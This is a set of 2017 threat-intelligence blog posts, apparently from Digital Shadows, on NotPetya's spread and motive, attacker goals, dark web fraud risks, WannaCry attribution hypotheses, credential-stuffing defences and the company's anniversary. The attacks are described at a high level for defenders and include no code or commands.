    Petya-Like Wormable Malware: The “Who” and the “Why” Fri, 30 Jun 2017 16:15:38 +0000 Late on 27 June, the New York Times reported that a number of Ukrainian banks and Ukrenergo, the Ukrainian state power distributor, had been affected by unidentified malware which caused significant operational disruption. Multiple security vendors and independent researchers subsequently identified the malware as a wormable ransomware variant with functional and technical similarities to Petya. Based on these similarities and continuing confusion, the malware has been dubbed Nyetya, Petna, ExPetr, and NotPetya, among others. It has been linked with a large number of infections, a significant proportion of which (around 60% according to statistics published by Kaspersky) affected machines in Ukraine, though at the time of writing the overall number of infections is not known.

    How NotPetya Works

    On 27 June, a social media account used by the National Police of Ukraine Cyberpolice Department, suggested that the reported infections originated from a compromised software update delivered to users through MeDoc, a Ukrainian accounting software provider. While MeDoc has denied this, Microsoft has confirmed that a small number of infections were the result of malware being delivered to machines by the MeDoc’s software update process. Once the malware was installed, intra-network propagation functions enabled it to rapidly spread between networked machines over the following vectors:

    • EternalBlue and EternalRomance exploits: EternalBlue and EternalRomance are exploits for SMB remote code execution vulnerabilities (CVE-2017-0144 and CVE-2017-0145) leaked by the Shadow Brokers in April These exploits were reportedly used to propagate between networked machines running SMB. Patches for these vulnerabilities were released by Microsoft in March (MS17-010) and in May.
    • PsExec: The ransomware used a tool similar to Mimikatz to harvest user credentials. These credentials were then passed to an older version of the PSExec Windows tool which was dropped by the malware. This tool then attempted to use PowerShell remote functionality to copy itself onto a target machine and begin execution.
    • Windows Management Instrumentation (WMI): The malware also enumerated Windows network shares with WMI and attempted to launch a copy of itself on any discovered network shares.

    Figure 1 below shows a possible deployment and propagation process for the malware.

    Deployment and intra network propagation Petya

    Figure 1 – Deployment and intra-network propagation

    Once installed, the malware functioned similarly to Petya, checking for the availability of Administrator privileges by using the Windows API AdjustTokenPrivileges function. If this was successful, the malware would overwrite the infected machine’s Master Boot record (MBR), rendering it unbootable. If this was not possible, AES-128 keys were used to encrypt each individual file, with the AES keys subsequently being encrypted using an RSA-2048 public key. To obtain the private RSA key necessary to recover the AES keys, victims were instructed to transfer $300 USD in Bitcoin to a specified Bitcoin ID and send their wallet ID and victim ID number in an email to a specified address.


    While the malware’s functionality has reportedly made it highly effective at propagating to machines within a local network, it has been reported as having no function for spreading outside of these local networks. It was therefore assessed as likely to be much more effective for conducting targeted attacks than wCry (AKA WannaCry).

    In the case of NotPetya, it is highly likely that the ransom payment method was never intended to result in revenue for attackers or the recovery of victim data. Although the email service provider with which the account was registered has publicly announced that this account has been disabled, it has subsequently been reported that victim ID numbers were pseudo randomly generated rather than being derived from the RSA key used for AES key encryption. This indicates that it would not be possible for the threat actors to provide victims with the correct decryption key, even if a victim had paid the ransom and succeeded in making contact. Furthermore, Matt Suiche has reported that, unlike Petya, which encrypts an infected machine’s MBR in a reversible manner, this malware reportedly irreversibly overwrote 24 sector blocks of the MBR section of an infected machine’s disk, rendering it permanently inoperable.

    With monetary gain as a motivation out the picture, the most likely motivation left for NotPeyta’s behavior is destructive malicious intent. Malicious intent is not synonymous with any single ‘class’ of threat actor, hacktivists ‘do it for the lulz”; nation state actors conduct malicious cyber-attacks to fulfill geostrategic objectives. With this in mind, NotPeyta does demonstrate an advanced understanding of how to mount a wide spread hard hitting cyber-attack, and to capitalize on this attack with maximum media exposure.


    Clues lie in the geopolitical context and the initial target geography of the malware. Kaspersky Labs have claimed a 60/30% split (total number of infections unknown) between Ukraine and Russia. Additionally, the initial attack occurred during the Ukrainian holiday celebrating independence from Russia. If one subscribes to the theory that Russian state or affiliated actors are responsible, this had the tactical effect of delaying a coherent response from Ukrainian defenders and strategically punishing Ukraine for its independence from Russia. Although these facts are interesting – and they do suggest that the malware was actively aimed at the Ukrainian economy – they are circumstantial and do not conclusively link the incident to any particular nation state. Attribution is and will continue to be a challenge.

    The technology behind this attack is well within the range of many hacktivists and cyber criminals, and so these details have less diagnostic value when considering the ‘who’. Although speculative, there are other factors to consider: the supply chain compromise, efforts at obfuscation (hiding the wiper as ransomware), the geography that the malware was deployed in, and the timing of the deployment with Ukrainian national holidays. These point towards an attacker with political motivations behind the attack. It seems that the actor behind the NotPetya variant was politically motivated with an exceptional appetite to conduct cyber-attacks against specific organizations within the Ukraine target geography.

    Longer-Term Implications

    So where does this incident leave the longer-term assessment of the implications of NotPetya?

    • Prepare for stray bullets. Many organizations were impacted by the NotPeyta campaign. The interconnectivity of modern systems and the ubiquity of applications means that enterprises could find themselves the victims of attacks not specifically targeting their organizations.
    • The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    Sadly, cyber-attacks of this nature are not uncommon and so businesses, governments and of course consumers need to take steps to protect themselves against ransomware attacks.

    1. The “basics” aren’t easy, but they should not be forgotten. Both NotPetya and the earlier WannaCry exploited basic and known security vulnerabilities, so segmenting networks and applying basic patching cycles will go a long way to mitigating threats such as this. This will go a long way in mitigating the ‘stray bullet’ factor outlined above.
    2. Think about the soft factors. Defense is not just about technical indicators and warning anymore, ‘soft’ factors such as motivation and geostrategic issues are now not just ‘nice to haves’ but are increasingly critical in the response to malware like NotPetya.
    3. Plan to fail. No amount of good security will entirely remove the risk posed by cyberattacks so it is critical to backup critical data and systems on a regular basis and ensure crisis management and comprehensive data recovery plans are in place and practiced.  Extortion and destructive malware response should be in your incident response playbooks.
    4. If you aren’t already doing so, think about the digital risks associated with your supply chain. Sure, not all suppliers are attack vectors for targeted attacks, but many suppliers do not have the mature levels of security. Regardless of the alleged culpability of MEDoc, the deployment mechanism does highlight the attention that we all need to start paying to supply chain compromise.
    5. Defense in depth. Digital Shadows advocate using a ‘defense in depth’ strategy guided by four main principles: configuring host-based firewalls and using IP-whitelisting measures, segmenting networks and restricting workstation-to-workstation communication, applying patches and disabling unneeded legacy features, and restricting access to important data to only those who are required to have it.

    WannaCry and NotPeyta are a sign of things to come, and you can expect attackers will improve their future campaigns.

    Keep Your Eyes on the Prize: Attack Vectors are Important But Don’t Ignore Attacker Goals Fri, 23 Jun 2017 16:45:41 +0000 Reporting on intrusions or attacks often dwells on the method that the attackers used to breach the defenses of a particular organization. However, the goals of the attacker are the most relevant to how an organization can protect itself. The goals of attackers reflect the perceived value of the critical assets an organization has to the attackers, which is independent from the value these assets have to the organization.

    The table below shows a carefully chosen sample of well-documented attacks on what attackers consider to be high-value or critical assets. It is worth noting the following attacks were performed by a mixture of nation states, mercenaries, nation state proxies, cyber criminals and hacktivists, showing a complex ecosystem. We do not aim to provide definitive attribution here, merely state which are the most likely candidates based on assessments from law enforcement or the wider community.

    High Value Asset Sector Threat Actor Impact on Target Examples
    Corporate IT infrastructure All Cyber criminals, nation-state process, nation states Availability Ransomware attacks like WannaCry or the Sony Pictures Entertainment attack deny access to IT resources in order to extort money from the victims and/or cause embarrassment
    All Nation states Confidentiality Russian-affiliated threat groups broke into a Voting software company in order to use their IT infrastructure to send phishing emails to subsequent targets
    Customer (WiFi) Networks Hospitality Nation states Confidentiality The Darkhotel APT group used hotel networks to target individuals of interest and deploy malware to customer machines through malicious software updates
    Cryptographic material Technology Cyber criminals, nation states Confidentiality DigiNotar’s cryptographic keys were stolen in order to forge certificates for eavesdropping on Internet users in Iran
    Database All Cyber criminals Confidentiality, Integrity, Availability The RansomWeb attack encrypted the victim’s database covertly and when the database and backups were fully encrypted, the encryption keys were removed, the database was inaccessible and ransom demands were made to the victim
    Financial transaction systems Finance Cyber criminals, nation states Confidentiality, Integrity Attackers breached various banks worldwide to send money to mule accounts via the SWIFT network infrastructure
    Finance Nation states Confidentiality Alleged Equation Group leaks detail the compromise of the SWIFT Service Bureau Eastnets to extract transaction information from their database
    Industrial process design and development Manufacturing, Aerospace, Defence Freelancers Confidentiality Su-Bin stole component design blueprints and flight test data for sale to competing companies
    Network infrastructure Broadcasting Nation states Availability TV5Monde’s routers and switches were corrupted by malicious firmware updates which caused the TV station to cease broadcasting
    Non-public information All Nation states Confidentiality Hackers allegedly from PLA Unit 61398 stole “thousands of e-mails and related attachments that provided detailed information about SolarWorld’s financial position, production capabilities, cost structure, and business strategy”
    Finance, Legal Cyber criminals Confidentiality Hackers stole non-public press releases about upcoming announcements by public companies concerning earnings, gross margins, revenues, etc. and used this information to conduct trades
    Source code Technology Freelancers, nation states Confidentiality Attackers compromised Yahoo in order to find the source code so they could forge cookies to gain persistent, unauthorized access to user accounts
    Payment card information Retail Cyber criminals Confidentiality Attackers stole 40 million records of payment card information from Target’s Point of Sale (PoS) systems via breaking into a supplier who had access to the Target network
    PHI/PII Healthcare Cyber criminals Confidentiality 80 million customer records were stolen from Anthem, this data may be used for espionage and/or financial crime such as filing fraudulent tax returns and issuing of pre-paid debit cards
    SCADA systems Energy Nation states Availability A cyber-attack was performed against a Ukrainian power company’s circuit breakers causing the loss of power to approximately 225,000 customers
    Social Media accounts All Cyber criminals Availability Wired reporter Mat Honan had his various cloud service accounts breached and his devices remotely wiped in order to takeover his social media account
    All Nation state proxy Integrity The Syrian Electronic Army hijacked the social media accounts of various global companies in order to spread propaganda

    A common theme running through the above table is how attackers take the path of least resistance to their goals and in the cases where critical assets were not reachable, used a creative approach to monetize the access that they did have.

    Some common themes concerning attacker goals emerge:

    • Attacks are a multi-stage process, each stage helps the attackers get closer to their goal. An organization may be compromised for its own assets or because its assets help an attacker reach its target. Financially-motived cyber criminal actors seek out not only directly monetizable assets like payment card information but also assets which can be sold such as PHI/PII or non-public information.
    • Sectors such as finance and defense are well-known targets for attackers, but following on from the multi-stage theme above, other organizations may find themselves as targets as they are on the “flight path” from the attacker to the intended target, for example, in the case of supply chain compromise.
    • While theft is very common (confidentiality violations), attacks on availability, such as extortion via ransomware, and attacks on integrity, such as source code manipulation, do also occur. Attackers have a diverse set of actions in their portfolio and may use any of them against a particular target.

    By understanding the goals of the attackers, defenders can understand which of their assets need to be safeguarded. Any breach investigation or incident response should attempt, where possible, to understand the goals of the attackers in order to gain insight on how attackers are targeting an organization’s assets.

    Recent attacks like the Nyetna outbreak highlight the difficulty of certainty around attacker goals as there may be deliberate attempts by the attacker to obscure their true goals, in such cases the different plausible attacker goals must be considered.

    We recently wrote a blog on five ways security engineering can help to protect these assets.

    Threats From the Dark Web Mon, 26 Jun 2017 16:22:44 +0000 Despite the hype associated with the dark web, maintaining visibility into it is an important component of a comprehensive digital risk management program. In support of our announcement today about the expansion of our SearchLight’s dark web collection capabilities, we wanted to highlight some of the digital risks that can be associated with the dark web in this blog. It is important note that these risks can also occur on the open and deep web, just as with our previous research on sites like

    Dark Web Risks

    Criminals are stealing customer data through payment systems and they are talking about it on the dark web

    The insecurity of payments systems makes the news frequently. Take the recent Chipotle breach, which resulted from malware on their Point of Sale devices. It’s important for retailers (and any organizations with ATMs or PoS devices) to ensure these devices and their transactions are secure. Having visibility into criminal forum conversations that discuss committing fraud against these devices, third parties or your company is critically important. It is also important to have visibility into the items for sale in criminal marketplaces that could be used to conduct fraud. This can be in many forms; it might be in a guide for ATM skimmers (Figure 1), or product listings for specific hardware. Having visibility to these dark web conversation can make the difference in stopping or mitigating a breach.

     ATM Skimming Guide

    Figure 1: Dark Web Marketplace offering guides on how to make ATM skimmers

    Criminals are selling customer account details on the dark web

    For banks seeking to protect their customers, gaining visibility and monitoring the dark web can be a highly valuable tool to stop fraud. Adversaries share credit card numbers on IRC channels (Figure 2) and sell accounts on dark web forums (Figure 3). Detecting these activities gives banks better visibility into their customers’ online exposure and enables them to get on the offense to minimize the impact.

    IRC BINs

    Figure 2: IRC channel sharing and testing customer credit card information

    Forum account for sale 

    Figure 3: Accounts for sale on the dark web

    Criminals are taking over employees and customers’ accounts

    It isn’t always a company’s assets that are at risk; organizations can also gain awareness of tools used against them. Figure 4 is an example of a tactic used to bypass SMS account verification. Understanding the latest tactics used by adversaries is vital for organization’s security decision-making to reduce their risk profile.

    Bypassing SMS

    Figure 4: New tool for bypassing SMS authentication offered, mentioning specific sites

    Criminals are conducting tax return fraud

    Tax milestones throughout the year are popular times for fraud, and tax information is high in demand by cybercriminals. Approaching the deadline for 2017’s tax return, we detected a user claiming to sell access to the PCs of an individuals working for accounting companies. The accompanying screenshots indicated that the user had access to information on hundreds of companies in the United States.

    tax fraud dark web 

    Figure 5: User selling access to an accounting company’s customer information, consisting sensitive tax information

    Digital Shadows provides the context you need to manage dark web threats

    It isn’t enough to simply detect mentions of company assets and concerns across the dark web. Organizations need context behind these posts to have a better understanding. As a result, today we announced an expansion of our SearchLight’s dark web collection capabilities where we help our customers manage their dark web threats in five ways:

    1. Detailed Explorer view. View the post in Searchlight’s explorer view to see previous posts by other users on the same thread or post. This enhanced view provides organizations with added context, enabling them to better understand how their company, employees or customers are likely to be impacted.
    2. Dark Web User Background. The incident also provides an overview of the user in question, with their username, date joined, activity levels and reputation. This enables you to understand the credibility of the dark web user, informing your response.
    3. Incident view with context. The incident includes a description, impact and recommendation action, all of which are written up by our team of expert analysts. This helps you to make a more informed decision about the risk to your business.
    4. Detailed Source Background. Pivot from the incident into the intelligence view, providing context on the forum or marketplace. This context includes a description, timeline of events, associations, intelligence, and associated sites and social media accounts.

    The importance of our team of data analysts extends beyond adding vital and relevant context. Not all dark or deep web sites can be easily accessed with technology on its own; expert human data analysts must also gain access to closed sources to provide the most relevant view of digital risks. Digital Shadows recognizes it is critical to complement automation with a team of data scientists and intelligence experts who gain access to closed sources, and qualify the data collected to enhance analytic capabilities. This gives our customers the full breadth and context needed to address the digital risks that are most relevant and impactful to their business. searchlight incident view

    Figure 6: SearchLight’s incident view, complete with vital context

    Armed with this vital context, organizations are better informed about the risks they face online across the open, deep and dark web; understanding not only when they are mentioned online, but also why, by whom and the likely impact to your organization.

    To learn more about Digital Shadows Searchlight™ dark web monitoring capability, watch this demo video or read our datasheet for more details.

    WannaCry: An Analysis of Competing Hypotheses – Part II Wed, 07 Jun 2017 16:30:52 +0000 Following the furore of last month’s WannaCry ransomware attacks, Digital Shadows produced an Analysis of Competing Hypotheses (ACH) table to make some initial assessments on the type of actor most likely to have been responsible for the campaign. First and foremost, the ACH method was chosen as it allows us to assess the reliability and relevance of the data available on open sources. As with most investigations, new evidence may emerge over time prompting us to re-examine previous assumptions and theories.

    In the case of WannaCry, several, potentially significant, data points have come to light in recent weeks, including:

    • The code similarities found between WannaCry samples from February 2017 and those previously used by the Lazarus Group have been further corroborated by other sources within the security community. We have, therefore, raised the Credibility of this data point to medium and the Relevance to high. Likewise, for reported malware similarities between WannaCry and other North Korean operations, we have also raised the Credibility of this data point to medium.
    • According to Sophos and Nominum Inc., the first evidence for WannaCry was found when a client from an ISP in Southeast Asia hit WannaCry’s “kill-switch” domain. While this type of evidence is not definitive, our own analysis of Google trending data indicated that users in Taiwan were one of the first to begin searching for WannaCry. The graph below, taken from Google API data, plots the normalized number of Google searches for the term “wana decryptor 2.0” (the term that appeared on the ransom note) by time and by country. Here we see that users in Taiwan began searching for the term “wana decryptor 2.0” at about 6am BST (1pm Taiwan time). As this graph relies on Google API data, Chinese searches were not included; nevertheless, there is a strong indication that south-east Asia was the first region to be affected by the ransomware.

    WannaCry 2 Searches

    Figure 1: Google searches for “wanna decryptor 2.0” by country (Please note that the y-axis does not represent the number of Google searches, but is instead a normalized number signifying the percentage of searches in that country for a specific term (in this case “wana decryptor 2.0”) in relation to all other Google searches.)

    • Language analysis of the various WannaCry ransom messages has indicated that 26 of the 28 messages were machine-translated from English. The Chinese-language version, however, appeared to have been written by a native speaker, and contained a typo that would highly unlikely have been the result of machine translation.

    As before, we considered four hypotheses for this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Once we add the new and amended data points, the table looks as follows:

    Wannacry ACH 2

    ACH Key

    Figure 1 – ACH diagram

    While the above points do not drastically change the outcome of our initial ACH table, the inconsistency score between H2 (an unsophisticated cybercriminal actor) and H4 (a nation-state or state-affiliated actor looking to discredit the NSA) does narrow. With so little between them, the margin of error is such that both scenarios were equally plausible. We therefore assessed that, based on the information available at the time of writing, the WannaCry campaign was most likely launched by either:

    a)     An unsophisticated financially-motivated cybercriminal actor – H2

    b)     A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Alternative hypotheses?

    As rightly mentioned by Pasquale Stirparo in a recent SANS blog referencing Digital Shadows, the ACH technique encourages collaborative discussion and alternative viewpoints. Our original aim in creating this ACH was to provide a structured analysis of the general type of threat actor responsible for WannaCry and – perhaps more significantly – this actor’s potential motivation. Our four original hypotheses were, therefore, fairly broad, and we have avoided focusing on specific threat actors given the inherent difficulty in providing attribution. Pasquale built upon our original ACH table by adding new data points and three alternative hypotheses, and we hope others will attempt their own analyses and further highlight the usefulness of this technique. While Pasquale chose to break out H4 into separate hypotheses for a (1) nation-state actor aiming to discredit the NSA and a (2) generic threat actor with the same motivation, we have decided to uphold our original four hypotheses given the overlapping objectives of these actors.[1]

    The death of Lazarus?

    The Lazarus Group remains one of the most difficult to incorporate into our ACH analysis, for several reasons. Firstly, there is still no clear, confirmed explanation for who this group is and how it operates. We have previously assessed it to be highly likely that the group has some affiliation with the North Korean state (DPRK) due to a significant proportion of the group’s activities being aligned with North Korea interests. While Lazarus’ pre-2016 activity mainly consisted of espionage-focused and disruptive operations, their more recent operations, such as the reported attacks on SWIFT banking networks, appear to be financially-motivated and more akin to the actions of an organized criminal group. There are, therefore, many unanswered questions: is Lazarus a standing unit of the DPRK’s intelligence services? If not, are they an organized criminal group? Lazarus command and control infrastructure has, at different points, been identified on both North Korean and Chinese ISPs – so where are they based? As we have yet to detect any conclusive evidence directly linking the group’s more recent financially motivated activity to the DPRK, we have developed alternative hypotheses for the nature of the Lazarus Group:

    1. The Lazarus Group is an organized crime group (OCG) based outside of the DPRK but with connections to the DPRK state via a relationship with foreign service elements of the Korean People’s Army (KPA). The group is tasked to perform operations on behalf of the DPRK by a case officer, but also operates for private profit.
    2. The Lazarus Group is a KPA unit, but does not always operate based on direct taskings and sometimes its operators conduct financially motivated operations. The unit is based outside the DPRK, which facilitates this activity.
    3. The Lazarus Group is not a single entity. Multiple individuals or groups have gained access to technical assets developed by the Lazarus Group through intentional or unintentional leaks, thefts or through sales.

    The nebulous nature of Lazarus creates obvious difficulties for our ACH analysis. Do we consider them a nation-state actor (therefore falling under H3 and H4), or an organized criminal group who at times work on behalf of state actors (H1)? Without having a clear understanding of what type of threat actor Lazarus is, it becomes very difficult to incorporate it into an ACH analysis designed to tackle our original question: what type of actor most likely to have been behind the WannaCry attacks?

    This is not to say that we are discounting the Lazarus Group. Far from it. The group could easily be considered as an example of three of our four original hypotheses (H1, H3 and H4). With H4 being one of our two most plausible scenarios, the case for Lazarus has certainly not gone cold. The new data points we have added – specifically that users in south-east Asia were reportedly among WannaCry’s first victims and the original ransom note was written by a native Chinese speaker – also point towards an East Asian nexus, which may or may not be significant for those considering a Lazarus Group attribution.

    This approach encourages collaboration within the community and enables us to think critically about evidence. By incorporating ACHs into their analysis, threat intelligence teams can make sense of the various pieces of evidence and better understand the likely motivations of adversaries.


    [1] We would also like to thank Pasquale for highlighting a formatting error in our original blog post that led to a small discrepancy in the inconsistency weighting score for H2.

    7 Tips for Protecting Against Account Takeovers Mon, 22 May 2017 19:16:16 +0000 In May 2017, an amalgamation of over 1 billion credentials was uploaded to the Have I Been Pwned database. One of the lists has been dubbed “Anti-Public”, and contained 457,962,538 unique email addresses. This list has reportedly previously been widely circulated and used for credential stuffing attacks, whereby attackers seek to identify instances of password reuse in order to compromise further accounts. (“Anti-Public” is also the name of a credential stuffing tool used to verify the legitimacy of compromised credentials).

    What is Credential Stuffing?

    Credential stuffing is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found. Our latest whitepaper looks at what credential stuffing is and what tools are being used for it. Later in this blog, I will outline seven tips you can take to protect against account takeover.

    There are billions of leaked credentials exposed online, so chances are that many of these have reused usernames and passwords. These are valuable to cybercriminals, who are increasingly turning to credential stuffing tools to automate attempts at account takeover. By looking at the site sentry[.]mba, its possible to get an idea of the most targeted organizations and sectors. Common targets for these attacks are the gaming, technology, broadcasting and retail sectors (see below).

    Sentry MBA Configuration Count

    Figure 1: The most prevalent sectors, based on the number of configuration files shared (green) and downloaded (purple) for organizations

    There are many credential stuffing tools available to cybercriminals but three stand out: SentryMBA, Vertex and Hitman. Our paper takes a look at how easy it is for cybercriminals to execute account takeovers. To protect yourself against account takeover, implement the following:

    1.  Monitor for leaked credentials of your employees. Troy Hunt’s is a great resource for this, alerting you to instances of breaches including your organization’s email domain.

    2.  Monitor for mentions of your company and brand names across cracking forums. This can help to direct your security investment. Use Google Alerts for this – Johnny Long offers some great tips for doing so ( and google alerts can provide a good identification of the specific risks to your business. Configuration files for your website that are being actively shared and downloaded are probably a good indication of impending attempts at account takeover.

    3.  Monitor for leaked credentials of your customers, allowing you to take a more proactive response. Consider alerting your customers that their email has been involved in a breach, prompting them to reset their password if they have reused credentials.

    4.  Deploy an inline Web Application Firewall. Commercial and open source web application firewalls, like ModSecurity, can be used to identify and block credential stuffing attacks.

    5.  Increase user awareness. Educate your staff and consumers about the dangers of using corporate email addresses for personal accounts, as well as reusing passwords.

    6.  Gain an awareness of credential stuffing tools. Keep an eye on the development of credential stuffing tools, and monitor how your security solutions can protect against evolving capabilities. Some credential stuffing tools are able to bypass some CAPTCHAs, for example.

    7.  Implement multi-factor authentication that doesn’t leverage SMS. This can help to reduce account takeovers, but make sure this is balanced against the friction (and cost) it can cause.

    WannaCry: An Analysis of Competing Hypotheses Thu, 18 May 2017 17:35:21 +0000 On 12 May 2017, as the WannaCry ransomware spread across computer networks across the world, a variety of explanations also began to worm their way through the information security community. Who was responsible for the WannaCry campaign? And what was the objective? Ransomware suggested it was the work of cybercriminals, although, given the sheer scale of infections and disruption, some commentators suspected the hand of a nation state. Despite relentless analysis from the security research community that has brought fragments of new information to the fore, no consensus has yet been reached on an attribution for the campaign.

    One of the most recent theories put forward rests on a possible connection between WannaCry and the Lazarus Group, an actor that has previously been linked with several high-profile network intrusions and assessed as highly likely to have some association with the Democratic People’s Republic of Korea (DPRK). Analysis has indicated that WannaCry samples from February 2017 contained a small section of code identical to those used in previous Lazarus campaigns. At the time of writing, however, we assessed there to be insufficient evidence to corroborate this claim of attribution to this group, and alternative hypotheses should be considered. While malware may initially be developed and used by a single actor, this does not mean that it will permanently remain unique to that actor. Malware samples might be accidentally or intentionally leaked, stolen, sold, or used in independent operations by individual members of a group. It is therefore important to consider other factors, such as the consistency of an operation with previous activity attributed to an actor.

    Digital Shadows has, therefore, applied the Analysis of Competing Hypothesis (ACH) technique to the information currently available through sources. ACH uses a weighted inconsistency algorithm to assign numeric values – weighted by the assessed reliability and relevance of each data point – to represent how consistent the available evidence is with a given hypothesis. While the aim here was not to provide a conclusive attribution for the WannaCry campaign, this structured analytical technique allows us to assess the reliability and relevance of the data presented thus far, as well as make some tentative assessments over the type of actor most likely to have been behind last week’s attacks. As such, we compared four hypotheses for the purposes of this exercise. That the campaign was the work of:

    • A sophisticated financially-motivated cybercriminal actor – H1
    • An unsophisticated financially-motivated cybercriminal actor – H2
    • A nation state or state-affiliated actor conducting a disruptive operation – H3
    • A nation state or state-affiliated actor aiming to discredit the National Security Agency (NSA) – H4

    Using a mixture of primary and secondary reporting, as well as assessments from Digital Shadows analysts, we have included a collection of the most salient data points to have emerged at the time of writing. As well as the widely-discussed use of the DOUBLEPULSAR backdoor dropper, ETERNALBLUE exploit, and SMB vulnerability, the latter for propagation, we have included several other pieces of evidence to drive our assessment. These are presented in the ACH table below, though some of the more significant points include:

    • So-called “kill-switch” probably an anti-sandboxing feature – MalwareTech, who discovered the unregistered domain, now believes this was most likely included as a badly-thought out anti-analysis measure.
    • Low number of Bitcoin wallets a result of an unintentional bug – Symantec have reported that the creation of only three Bitcoin wallets for victims to transfer payment into was the result of a bug in the malware’s code, referred to as a race condition.
    • No evidence that the malware was delivered via phishing emails – IBM X-Force, for example, scanned over one billion emails passing through its honeypots and found no evidence suggesting spam/phishing was the initial infection vector.
    • Unconfirmed links to Lazarus Group and North Korean campaigns – Some researchers have now claimed that WannaCry contained pieces of code previously associated with the Lazarus Group, as well as two malware variants (called Joanap and Brambul) used in attacks against South Korean organizations. This connection, however, was assessed to be primarily based on the ordering of ciphers and public libraries used by the Lazarus Group, and inconclusive at the time of writing.

    ACH reveals the most plausible scenario is that an unsophisticated cybercriminal actor launched the WannaCry campaign

     ACH WannaCry

    Figure 1 – ACH diagram

    Though by no means definitive, we assessed that a WannaCry campaign launched by an unsophisticated cybercriminal actor was the most plausible scenario based on the information that is currently available. While there were numerous data points that were consistent with this assessment, a few stand out:

    • Coordination and implementation of the campaign was relatively poor: victims who paid reportedly did not receive decryption keys
    • No discernible pattern to the organizations that were targeted
    • Only three Bitcoin wallets were created for the receipt of payment
    • An inability to monetize effectively
    • Failed anti-sandboxing measure and race condition bug

    These inconsistencies are not errors we normally associate with a sophisticated cybercriminal operation. The Carbanak (AKA Anunak) organized criminal group, in comparison, are known for conducting highly-targeted, lucrative, and efficient operations relying on the strategic use of social engineering attacks and network intrusions that more resemble the tactics used by Advanced Persistent Threat (APT) groups.

    H3 and H4, which posit that the campaign was the work of a state-affiliated actor, also contain inconsistencies:

    • If the attacks were aimed to discredit the NSA (H4), then why the lack of a supporting media narrative driving this message home? In the 2016 attacks on the US Presidential election, for example, network intrusions against the Democratic Party and subsequent data leaks were accompanied by blog posts and media commentary critical of Hillary Clinton. Were this to be a nation state campaign intended to cause disruption (H3), we would also expect to see some level of target specification alongside clear campaign objectives.
    • During their previous destructive campaigns, the Lazarus Group, for example, have generally displayed a consistent level of geographic targeting – primarily against organizations in South Korea and the US. Specific industries such as media companies, financial institutions and critical national infrastructure have been the main targets of attack, but in the case of WannaCry, infections were widely distributed across the world, and the malware appeared to spread virtually indiscriminately with no control by its operators. Had the attackers used a phishing vector, they would have been able to limit the malware’s capability to spread outside a network and instead used spear phishing emails to target selected organizations.

    Such tactics would have been more consistent with the activities of a sophisticated criminal outfit or a technically-competent nation-state actor.

    It is entirely possible that new information will come to light in future that further supports, or even discredits, some of the hypotheses proposed in this exercise. While attribution may be exciting and fulfill our insatiable desire to put a face to the crime, perhaps what is more important in this instance is reviewing what lessons we can learn from the WannaCry campaign? For this we advise checking out the recent blog from the Digital Shadows Security Engineering Team, which outlines five fundamental and widely used security principles that are reusable across different types of attackers, be it nation-state or petty cybercriminal.

    Digital Shadows’ 6th Anniversary Tue, 16 May 2017 23:33:30 +0000 It’s amazing to think that the idea James and I began working on from a kitchen table in London in May 2011 has now become the global cyber security company, Digital Shadows. The last 6 years have at times felt like a blur. We both feel privileged to have been on a journey full of challenges, excitement, ups and downs and remarkable progress for the firm.

    top images min

    Rewinding to 2011 and our original inspiration for Digital Shadows, we recognized that the world was changing dramatically as companies adopted the cloud, social media and mobile devices for huge business benefits. From a security perspective, it was no longer going to be enough to focus solely on the network and the perimeter when much of the relevant, sensitive data was now being held outside the confines of the corporate boundary and faced new threats. We could see a range of new digital risks including data loss, brand and reputational damage, and cyber threats amongst many others, and no solution in sight.

    Classic startup/VC wisdom is to focus on a single area and be the best at that, which could have led us to focus on one of the risks/consequences of the boundaries disappearing around companies. Instead, in working very closely with our early clients we realized that part of our strength was in the breadth of the issues and data sources we covered: Third party risk, customer data leakage, fake and misleading social media profiles, code and credential compromise amongst many other issues – they were all important. So, we eschewed the traditional advice and set out to build a comprehensive solution to managing digital risks beyond the boundary. While there is always more to do and we are constantly improving, we are proud to now protect over 100 leading companies in 14 countries worldwide and to be scaling faster than ever before.

    Screen Shot 2017 05 16 at 3.39.31 PM

    The last 12 months have been particularly exciting for the company. We’ve opened new offices in London, Dallas and San Francisco as our employee count has doubled to over 130. Amongst them are key members of the leadership team like Daniel Moskowitz as CFO, Alex Seton as VP Business & Corporate Development and most recently, Dan Lowden as CMO. Our revenues have grown faster than ever, with 2016 marking our 3rd consecutive year of triple-digit growth. It’s been a pleasure to see how diverse the market is for Digital Shadows, with clients in a huge range of industries and new geographies such as the Middle East and Asia Pac to join our home markets of the USA and Europe. We hear from our clients that the three main aspects of our service are:

    • The ‘human in the loop’: We provide a full service including analysts on our side that apply specialist expertise and verify incidents before they are sent to our clients, eliminating false positives and work for our clients. Most companies that we have encountered prefer this approach over having to hire more employees to do this on their behalf, having to procure and use a set of tools, sifting through false positives and using yet more portals. There is a high total cost of ownership in this hard-to-hire market.
    • Broad coverage: The coverage we provide is broader than anything else available.  Most companies don’t want to build their own solutions or try to integrate 4 or 5 point products, so knowing that we have the widest coverage of data sources in scope is a key priority, especially when many know we are trusted by global banks, stock exchanges and critical national infrastructure.
    • The relevance of what we provide: We strive to only tell our clients the things they care about and can do something about. Uniquely, our analysts provide our clients with a recommended mitigation for every client incident we send them.

    Our customers are everything to us, and so James and I do our best to check in with as many as we can to get their feedback. Alongside our product team, we do our best to really understand the problems our clients face so that we can continue to innovate in the right direction. Our recent new UI launch and leading mobile app store coverage resulted from some of that feedback. We have more exciting new announcements in this regard over the coming months.

    Finally, we are proud of the exceptional team we have assembled and the culture they have created. That’s what makes the company what it is. For several years we have codified our culture into a set of values defined by the team themselves that we have used to inform decision making and hiring. These values are enclosed below.

     DS Offices

    Thank you for reading this far. To our clients, thank you for all your support and feedback over the years for which we are extremely grateful. To our employees – James and I look forward to our anniversary celebrations later today and we will be raising a glass to all of you – happy birthday!

    Digital Shadows: Our Values

    Do the Right Thing

    We are an ethical company operating with respect, empathy and equality. We respect everyone’s security, freedom and privacy.

    Anything is Possible

    We encourage innovation, independent thinking and team work.

